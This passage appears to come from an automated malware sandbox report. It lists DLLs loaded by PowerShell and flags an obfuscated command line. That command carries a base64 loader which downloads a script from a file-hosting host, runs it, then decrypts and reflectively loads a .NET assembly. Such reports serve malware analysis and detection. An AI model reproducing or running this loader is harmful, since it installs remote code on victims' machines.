                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Suspicious powershell command line found
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRh